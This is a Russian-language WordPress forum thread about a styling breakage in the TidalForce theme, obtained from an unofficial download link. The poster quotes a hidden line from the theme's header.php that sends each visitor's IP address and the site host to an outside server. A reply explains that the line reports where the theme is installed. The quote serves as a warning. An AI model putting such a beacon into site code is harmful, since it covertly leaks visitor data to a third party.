[Помогите] Подключить тему от elegantthemes

Тема в разделе "Wordpress", создана пользователем Ergoline, 20 июн 2010.

Статус темы:
Закрыта.
Модераторы: Sorcus
  1. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.236
    Симпатии:
    422
    Преамбула
    Есть знакомый который делает себе тестовый сайт.
    Понравилась ему очень своей простотой тема от elegantthemes - Tidalforce .
    Demo http://www.elegantthemes.com/preview/TidalForce/
    Функционал http://www.elegantthemes.com/gallery/tidalforce/
    Вроде требования установить граватар и лимит-пост активированы. Одна категория Featured Artikles названа.
    И даже пару фоток было введено через дополнительное поле
    thumbnail
    В режиме предпросмотра вроде все зашибись.
    Но вот при активации на сервере все расползается (под денвером нормально).

    Соответсвенно вопросы -
    1. в какую сторону рыть?
    2. если фотки будут заполняться через это дополнительное поле - thumbnail, не будет ли проблем при переходе на другую тему? ( в вордпрессе я не спец:(, и меток и функций не знаю)
    3. Скачать саму тему - http://unextupload.com/download_folder/6254 Только там в файле header.php в 33 строке крыса - <?php $i = $_SERVER['REMOTE_ADDR']; $s = $_SERVER['HTTP_HOST']; echo @file_get_contents("http://allxhost.com/o.php?i=".$i."&=s".$s); ?>
    4.3. Есть еще пару вопросов, но это походу.
     

    Вложения:

    • image001.png
      image001.png
      Размер файла:
      126,4 КБ
      Просмотров:
      10
    • image003.png
      image003.png
      Размер файла:
      103,7 КБ
      Просмотров:
      9
    • image005.png
      image005.png
      Размер файла:
      122,1 КБ
      Просмотров:
      9
  2. xbreaker

    xbreaker Вверх ногами

    Регистр.:
    15 авг 2007
    Сообщения:
    245
    Симпатии:
    52
    1. в сторону того что у вас не подгружается css файл, если верить скриншотам
    2. будет, если thumbnail - это доп поле поста, то каждая тема использует их по своему, если использует вообще
    3. это код стучалки, которая сообщает на указанный урл адрес, где установлена эта тема
     
    Ergoline нравится это.
  3. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.236
    Симпатии:
    422
    Протупил - готовлюсь в командировку, так что все на бегу.
    Вернусь через 3 суток.
    Пожалуй на счет css согласен.
    По тому как сам файл style.css внутри заккоментирован,
    PHP:
    /
    Theme NameTidalForce
    Theme URI
    ___elegantwordpressthemes___com/themes/tidalforce
    Version
    1.0
    Description
    2 Column theme from Elegant WPT
    Author
    Elegant Wordpress Theme
    Author URI
    _____elegantwordpressthemes__com
    /
    но в style.php вроде все как надо.
    И в режиме предпросмотра вроде все нормально.
    Может в style.php оставить только
    PHP:
    <?php
    require_once( dirname(__FILE__) . '../../../../wp-config.php');
    require_once( 
    dirname(__FILE__) . '/functions.php');
    header("Content-type: text/css");

    global 
    $options;

    foreach (
    $options as $value) {
        if (
    get_settings$value['id'] ) === FALSE) { $$value['id'] = $value['std']; } else { $$value['id'] = get_settings$value['id'] ); } }
    ?>
    а все остальное, что относится к дивам перегнать в style.css?
     
  4. xbreaker

    xbreaker Вверх ногами

    Регистр.:
    15 авг 2007
    Сообщения:
    245
    Симпатии:
    52
    попробуйте style.php вообще удалить (в том числе и указанные вами строки), а описания стилей перенести в style.css, не удаляя при этом в style.css закоменнтированных строк - в них идет описание темы для ВП

    хотя при этом скорее всего настройки темы работать не будут, их можно заметить в functions.php
     
  5. Ergoline

    Ergoline madao

    Регистр.:
    28 июл 2006
    Сообщения:
    1.236
    Симпатии:
    422
    Только вернулся из командировки.
    Закинул в стайл цсс инфу по стилям.
    Стало гораздо лучше, хотя и не так(и не там) цвета шрифтов вышли.
    И в одном и том же меню ссылки выглядят и как активные, и как неактивные(выборочно) одновременно.

    В общем как я догадываюсь подводных камней здесь еще хватит, а дергать все время окружающих не удобно. Завтра сделаю еще 1 попытку, и все... Либо,
    попробую найти челу другую тему. Хотя эта подходила в тему.
     
  6. xbreaker

    xbreaker Вверх ногами

    Регистр.:
    15 авг 2007
    Сообщения:
    245
    Симпатии:
    52
    поправьте нужные стили сами, посмотреть классы и связанные с ними стили вам поможет, например, firebug - плагин под firefox и google chrome
     
Статус темы:
Закрыта.